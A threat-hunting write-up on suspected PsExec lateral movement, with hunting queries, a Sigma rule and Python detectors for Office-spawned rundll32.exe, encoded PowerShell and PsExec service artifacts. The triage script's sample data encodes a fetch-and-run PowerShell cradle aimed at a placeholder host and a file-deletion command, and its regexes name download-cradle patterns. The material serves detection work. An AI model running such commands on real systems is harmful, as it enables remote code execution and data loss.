Investigating PsExec Lateral Movement Activity

Why This Activity Stood Out

During a routine review of our security telemetry, we noticed an unusual spike in process creation events originating from endpoints in our Office365 environment. The Sysmon logs flagged several instances of rundll32.exe with command-line arguments that resembled the remote-execution patterns we associate with PsExec-style tooling. PsExec itself runs commands through the PSEXESVC service it installs on the target rather than through rundll32.exe, so we treated the rundll32.exe activity as a possible follow-on payload rather than as PsExec proper. Given recent reporting on Wizard Spider intrusions, which have relied on PsExec to push payloads across a domain, this activity was a red flag: it could indicate an adversary using these tools for lateral movement.

Initial Hunt Logic

Our initial hypothesis was that an adversary might be using PsExec or similar tools to move laterally within our network, using Office365 endpoints as stepping stones. We pulled Sysmon process-creation events together with other endpoint and network logs to gather the data points needed for the investigation.

Reviewing Process Lineage

KQL Hunting Reference

DeviceProcessEvents
| where FileName =~ "rundll32.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, ProcessCommandLine

SPL Hunting Reference

index=sysmon EventCode=1 Image="*rundll32.exe"
| stats count by Computer, ParentImage, CommandLine

These queries helped us identify multiple instances of rundll32.exe being executed with suspicious arguments. We decided to dig deeper into the process lineage and parent-child relationships to understand how these processes were initiated.

Expanding the Investigation

Process Tree Analysis

We used Sysmon event ID 1 (process creation) and, where we needed lifetime context, event ID 5 (process termination). By examining the ParentImage and ParentCommandLine fields alongside Image and CommandLine, and joining ParentProcessGuid back to ProcessGuid, we could trace the parent processes that triggered these suspicious executions. (Sysmon event IDs 10 and 13 are process access and registry value set, respectively; they do not describe process lineage.)

Sysmon
| where EventID == 1
| project Computer, ParentProcessGuid, ParentImage, ParentCommandLine, ProcessGuid, Image, CommandLine

Finding Suspicious Patterns

Several patterns emerged:

  • Unexpected Parent Processes: Some rundll32.exe executions were initiated by Office applications like Excel or Word.
  • Complex Command Lines: The command lines often contained encoded PowerShell scripts and other obfuscation techniques.
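As an added example (not part of the original hunt and not the team's own tooling), the following Python walks constructed Sysmon event ID 1 records the way the process-tree step above describes: it joins ParentProcessGuid to ProcessGuid and reports any rundll32.exe whose ancestry, within a few hops, includes an Office application. It goes slightly beyond the direct parent-child case in the text by also catching an intermediate cmd.exe hop. The sample records, the shortened GUID values and the Office image list are constructed for illustration.

```python
"""Trace rundll32.exe back through Sysmon Event ID 1 lineage to an Office parent.

Added example, not from the original hunt write-up; the records, GUIDs and
Office image names below are constructed for illustration."""

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed Sysmon EID 1 records (field names follow Sysmon). GUIDs shortened.
EVENTS = [
    {"ProcessGuid": "{A1}", "ParentProcessGuid": "{00}",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "{A2}", "ParentProcessGuid": "{A1}",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n C:\\Users\\jdoe\\Downloads\\invoice.docm'},
    {"ProcessGuid": "{A3}", "ParentProcessGuid": "{A2}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c rundll32.exe C:\\Users\\Public\\upd.dll,DllMain"},
    {"ProcessGuid": "{A4}", "ParentProcessGuid": "{A3}",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Users\\Public\\upd.dll,DllMain"},
    # Benign control: rundll32.exe under services.exe with no Office ancestor
    {"ProcessGuid": "{B1}", "ParentProcessGuid": "{00}",
     "Image": r"C:\Windows\System32\services.exe", "CommandLine": "services.exe"},
    {"ProcessGuid": "{B2}", "ParentProcessGuid": "{B1}",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def image_name(path):
    """File name of an Image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(index, guid):
    """Return the process and its ancestors, child first, following ParentProcessGuid.
    The seen-set guards against cycles caused by GUID reuse in malformed data."""
    chain, seen = [], set()
    while guid in index and guid not in seen:
        seen.add(guid)
        chain.append(index[guid])
        guid = index[guid]["ParentProcessGuid"]
    return chain


def find_office_spawned_rundll32(events, max_depth=4):
    """Flag every rundll32.exe that has an Office application within max_depth ancestors."""
    index = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e["Image"]) != "rundll32.exe":
            continue
        chain = ancestry(index, e["ProcessGuid"])
        for depth, anc in enumerate(chain[1:max_depth + 1], start=1):
            if image_name(anc["Image"]) in OFFICE_IMAGES:
                hits.append({
                    "ProcessGuid": e["ProcessGuid"],
                    "CommandLine": e["CommandLine"],
                    "OfficeAncestor": image_name(anc["Image"]),
                    "Depth": depth,
                    "Chain": " -> ".join(image_name(x["Image"]) for x in reversed(chain)),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_office_spawned_rundll32(EVENTS):
        print(f"{hit['Chain']}  (Office ancestor {hit['OfficeAncestor']} at depth {hit['Depth']})")
        print("  ", hit["CommandLine"])
```

Run on the sample, only the Word-launched chain is reported; the rundll32.exe under services.exe is ignored. Lowering max_depth to 1 restricts the check to the direct parent, which is what the KQL and SPL queries above see.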

Detection Opportunities

To better detect this activity, we considered extending our existing detections. Here's a proposed Sigma rule covering both patterns we saw: rundll32.exe launched by an Office application, and encoded PowerShell command lines:

title: Rundll32 Launched by Office Application or Encoded PowerShell Command Line
status: experimental
description: Flags rundll32.exe started by an Office application, and any process creation whose command line carries an encoded PowerShell command. Both patterns were seen in this hunt.
logsource:
  category: process_creation
  product: windows
detection:
  selection_office_rundll32:
    Image|endswith: '\rundll32.exe'
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\POWERPNT.EXE'
      - '\OUTLOOK.EXE'
  selection_encoded:
    CommandLine|contains:
      - ' -e '
      - ' -ec '
      - '-enc'
      - 'EncodedCommand'
  condition: selection_office_rundll32 or selection_encoded
falsepositives:
  - Office automation, scheduled administration scripts and backup agents that legitimately run encoded PowerShell or rundll32.exe
level: high

Analyst Notes

Process Lineage Analysis

We observed that some rundll32.exe executions were spawned by legitimate Office applications, which made them look unremarkable on the surface. Deeper analysis showed that these processes often carried complex command lines with encoded payloads.

Suspicious Behavior vs False Positives

Some normal business operations could also trigger similar behavior:

  • Office Automation: Developers or power users might automate certain tasks using rundll32.exe and PowerShell.
  • Backup Tools: Some backup solutions use rundll32.exe for file system interactions.

To mitigate false positives, we decided to implement additional checks: the parent process and the DLL or script that rundll32.exe loads should resolve to a known, signed location (an approved PowerShell module directory or a vendor's installation directory), and the decoded command should match a documented automation job.
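The Sigma rule above keys on the presence of an encoded command; the triage step it implies is decoding that argument and applying the allow-list checks just described. The following Python does both, as an added example that is not part of the original hunt or its tooling: it extracts the base64 argument (powershell.exe accepts -e, -ec, -en and -enc as abbreviations of -EncodedCommand), decodes the UTF-16LE script, and classifies the record. The sample records, the approved parent path and the approved module name are constructed and hypothetical.

```python
"""Decode PowerShell -EncodedCommand arguments and triage them against an allow-list.

Added example, not from the original hunt write-up. The sample records, the
approved parent path and the approved module name are constructed/hypothetical."""
import base64
import binascii
import re

# powershell.exe accepts unambiguous abbreviations of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?<!\S)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]+=*)")
# Download cradles and in-memory execution inside the decoded script
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string")
# Hidden-window flag on the outer command line
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")

# Hypothetical allow-list: a vendor agent that legitimately runs encoded commands, and its module.
APPROVED_PARENTS = {r"c:\program files\contoso backup\agent.exe"}
APPROVED_MODULES = {"contosobackup"}


def encode_ps(script):
    """UTF-16LE + base64, the form powershell.exe expects; used to build the samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(command_line):
    """Return the base64 argument following an encoded-command flag, or None."""
    m = ENC_FLAG.search(command_line)
    return m.group(1) if m else None


def decode_encoded_command(command_line):
    """Decoded script text, or None if there is no flag or the argument is not valid base64/UTF-16LE."""
    arg = extract_encoded(command_line)
    if arg is None:
        return None
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(event):
    """'none' (no encoded flag), 'suspicious', 'allowlisted', or 'review' (flag present, no verdict)."""
    cmd = event["CommandLine"]
    if extract_encoded(cmd) is None:
        return "none"
    script = decode_encoded_command(cmd)
    if script is None:
        return "review"            # flag present but payload does not decode: still worth a look
    if CRADLE.search(script) or HIDDEN.search(cmd):
        return "suspicious"
    imports = {m.lower() for m in re.findall(r"(?i)import-module\s+([\w.]+)", script)}
    if event["ParentImage"].lower() in APPROVED_PARENTS and imports and imports <= APPROVED_MODULES:
        return "allowlisted"
    return "review"


def triage_all(events):
    return [triage(e) for e in events]


# Constructed process-creation records (not real telemetry)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"ParentImage": r"C:\Program Files\Contoso Backup\agent.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand "
                    + encode_ps("Import-Module ContosoBackup; Start-ContosoBackup -Job Nightly")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -ec " + encode_ps("Get-ChildItem C:\\Temp | Remove-Item")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -enc not_base64!!"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(f"{verdict:12} {ev['CommandLine'][:60]}")
```

The allow-list is deliberately conjunctive: the parent must be approved and every module the script imports must be approved. An encoded command whose payload does not decode is routed to review rather than dropped, since a flag with garbage behind it is exactly what a broken or deliberately malformed stager looks like.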

Telemetry Blind Spots

While Sysmon provided detailed process events, there were still some gaps:

  • Network Traffic: The exact nature of data being transferred during these executions was not always visible.
  • Registry Changes: without Sysmon event IDs 12 to 14 (registry key and value events) in the configuration, modifications made by malicious processes might have been missed.

Operational Challenges

Limitations of Detections

Our initial detection focused on rundll32.exe command lines, but PsExec itself leaves different artifacts that this detection does not cover: a service installation on the target (System event 7045, PSEXESVC by default), the service binary written over the ADMIN$ share, and the PSEXESVC named pipe. Other lateral movement tools and techniques leave yet other trails, so we need to keep refining our detections rather than relying on a single process name.

Realistic Troubleshooting

We encountered issues with false positives due to the complexity of legitimate business processes. To address this, we decided to implement a multi-layered approach:

  • Baseline Analysis: Establishing a baseline for normal Office application behavior.
  • Behavioral Anomalies: Identifying deviations from expected behavior.

MITRE ATT&CK Mapping

T1021 Remote Services

T1021.002 SMB/Windows Admin Shares

Description: Adversaries may use SMB and the hidden administrative shares (e.g., \\ComputerName\ADMIN$ or C$) to copy tools to and interact with remote systems; PsExec writes its service binary to ADMIN$ and talks to it over a named pipe on IPC$.

  • SMB Logs: Security events 5140 (network share accessed) and 5145 (share object checked) show which account reached ADMIN$, C$ or IPC$ and from which address.
  • 4624 Logon Events: a type 3 (network) logon from an unexpected source address or account precedes the share access and the service install.

T1569.002 Service Execution

Description: Adversaries may abuse the Windows service control manager to execute commands on a remote host; PsExec is the canonical example.

  • Sysmon Event ID 1: process creation on the target, for example PSEXESVC.exe started by services.exe and its child processes.
  • Service Creation Logs: System event 7045 (and Security 4697 where enabled) records services such as PSEXESVC installed to execute the remote command.
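Putting the artifacts in the mapping above together, the following Python correlates, per target host and within a short window, a type 3 logon (4624), ADMIN$ access (5140, which requires the Audit File Share subcategory), a service install (7045) and the service's named pipes (Sysmon 17/18) into a single PsExec finding. It also handles the renamed-service case (PsExec -r), which defeats a plain PSEXESVC string match, by relying on the %SystemRoot% drop location and the <service>-<host>-<pid>-stdin/stdout/stderr pipe naming. This is an added example, not from the original write-up; the records, the 60-second window and the score threshold are constructed assumptions.

```python
"""Correlate the artifacts PsExec leaves on a target host into one finding.

Added example, not from the original hunt write-up. The records, the 60-second
window and the score threshold are constructed assumptions for illustration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records; field names mirror the Windows Security, System and Sysmon events
RECORDS = [
    # Host FS01: textbook PsExec (default service name)
    {"ts": "2024-05-01T10:00:01", "host": "FS01", "Channel": "Security", "EventID": 4624,
     "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "10.1.2.50"},
    {"ts": "2024-05-01T10:00:02", "host": "FS01", "Channel": "Security", "EventID": 5140,
     "ShareName": r"\\*\ADMIN$", "SubjectUserName": "svc_backup", "IpAddress": "10.1.2.50"},
    {"ts": "2024-05-01T10:00:03", "host": "FS01", "Channel": "System", "EventID": 7045,
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"ts": "2024-05-01T10:00:03", "host": "FS01", "Channel": "Sysmon", "EventID": 17,
     "PipeName": r"\PSEXESVC"},
    {"ts": "2024-05-01T10:00:04", "host": "FS01", "Channel": "Sysmon", "EventID": 17,
     "PipeName": r"\PSEXESVC-WS042-4120-stdin"},
    # Host DC02: PsExec run with -r updsvc, so the service and pipe names are not PSEXESVC
    {"ts": "2024-05-01T11:30:00", "host": "DC02", "Channel": "Security", "EventID": 4624,
     "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.1.2.77"},
    {"ts": "2024-05-01T11:30:01", "host": "DC02", "Channel": "Security", "EventID": 5140,
     "ShareName": r"\\*\ADMIN$", "SubjectUserName": "jdoe", "IpAddress": "10.1.2.77"},
    {"ts": "2024-05-01T11:30:02", "host": "DC02", "Channel": "System", "EventID": 7045,
     "ServiceName": "updsvc", "ImagePath": r"%SystemRoot%\updsvc.exe"},
    {"ts": "2024-05-01T11:30:02", "host": "DC02", "Channel": "Sysmon", "EventID": 17,
     "PipeName": r"\updsvc-WS017-988-stdout"},
    # Host WS09: a local installer registering a service; no remote logon, share access or pipe
    {"ts": "2024-05-01T12:00:00", "host": "WS09", "Channel": "System", "EventID": 7045,
     "ServiceName": "ContosoAgent", "ImagePath": r"C:\Program Files\Contoso\agent.exe"},
]

WINDOW = timedelta(seconds=60)
# PsExec I/O pipes are named <service>-<client host>-<client pid>-stdin|stdout|stderr
IO_PIPE = re.compile(r"-\d+-(stdin|stdout|stderr)$", re.IGNORECASE)


def _ts(rec):
    return datetime.fromisoformat(rec["ts"])


def _within(rec, start, end):
    return start <= _ts(rec) <= end


def correlate_psexec(records, window=WINDOW, min_score=3):
    """Return one finding per service install that is surrounded by PsExec-style artifacts."""
    by_host = defaultdict(list)
    for rec in records:
        by_host[rec["host"]].append(rec)
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        for svc in [r for r in evs if r["Channel"] == "System" and r["EventID"] == 7045]:
            t = _ts(svc)
            name = svc["ServiceName"].lower()
            path = svc["ImagePath"].lower()
            # PsExec copies its service binary straight into %SystemRoot% (renamed with -r)
            in_sysroot = path.startswith("%systemroot%\\") and path.count("\\") == 1
            logons = [r for r in evs if r["EventID"] == 4624 and r.get("LogonType") == 3
                      and _within(r, t - window, t)]
            shares = [r for r in evs if r["EventID"] == 5140
                      and r.get("ShareName", "").upper().endswith("ADMIN$")
                      and _within(r, t - window, t)]
            pipes = [r for r in evs if r["Channel"] == "Sysmon" and r["EventID"] in (17, 18)
                     and _within(r, t, t + window)
                     and r["PipeName"].lstrip("\\").lower().split("-")[0] == name]
            io_pipes = [p for p in pipes if IO_PIPE.search(p["PipeName"])]
            score = sum(map(bool, (logons, shares, pipes, io_pipes, in_sysroot)))
            if score < min_score:
                continue
            src = logons or shares
            findings.append({
                "host": host, "time": svc["ts"], "service": svc["ServiceName"],
                "renamed": name != "psexesvc", "score": score,
                "source_ip": src[0]["IpAddress"] if src else None,
                "user": (logons[0]["TargetUserName"] if logons
                         else shares[0]["SubjectUserName"] if shares else None),
            })
    return findings


if __name__ == "__main__":
    for finding in correlate_psexec(RECORDS):
        print(finding)
```

Both FS01 and DC02 score 5 of 5 and are reported with the source address and account taken from the logon; WS09 scores 0 and is dropped. The service-name check is intentionally not "equals PSEXESVC": the pipe prefix is matched against whatever name the 7045 event carries, so a renamed service is caught by the same logic and marked renamed.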

Practical Detection Recommendations

  1. Enhance Sigma Rules:

    • Pair the process_creation rule for rundll32.exe with an image_load rule on the DLL it loads (unsigned, or outside Program Files and System32) and a service-install rule for PSEXESVC-style services (System 7045 with an ImagePath directly under %SystemRoot%).
  2. Implement Multi-Layered Detection:

    • Combine Sysmon, WMI-Activity logs and PowerShell Script Block Logging (event ID 4104) so that encoded commands are visible in clear text.
  3. Continuous Monitoring:

    • Set up real-time alerts for unusual command-line arguments and unexpected parent-child process pairs.
  4. Behavioral Analysis:

    • Develop heuristics based on normal business operations to reduce false positives.

Telemetry Improvement Ideas

  1. Enable Detailed SMB Logging:

    • Turn on the Audit File Share and Audit Detailed File Share subcategories so that Security events 5140 and 5145 record which account touched ADMIN$ and which file it accessed there.
  2. Increase Sysmon Coverage:

    • Add event IDs 3 (network connection), 7 (image load), 17 and 18 (named pipe created/connected) and 12 to 14 (registry) to the configuration; the named-pipe events are what expose the PSEXESVC pipe.
  3. Implement Endpoint Detection and Response (EDR):

    • Use EDR tools that offer deeper insights into process behavior and network communications.

Operational Observations

  • Telemetry Quality: The quality of telemetry is crucial, but it can be limited by the configuration and settings in place.
  • User Education: Training users on recognizing suspicious activities can help reduce false alarms.
  • Incident Response: A well-defined incident response plan ensures quick and effective handling of potential threats.

Hashtags Relevant to the Hunt Topic

#PsExec #LateralMovement #WizardSpider #SMB #Sysmon #EndpointProtection #TelemetryGaps #ProcessCreation #SecurityHunting #ThreatHunter #MITREATTACK

This investigation provided valuable insights into how adversaries can use legitimate tools for malicious purposes. By refining our detection methods and continuously monitoring our environment, we can better protect against such threats.

#ThreatHunting #CyberSecurity #BlueTeam #SOC #DetectionEngineering #MITREATTACK #LateralMovement #Windows #PsExecLateralMovement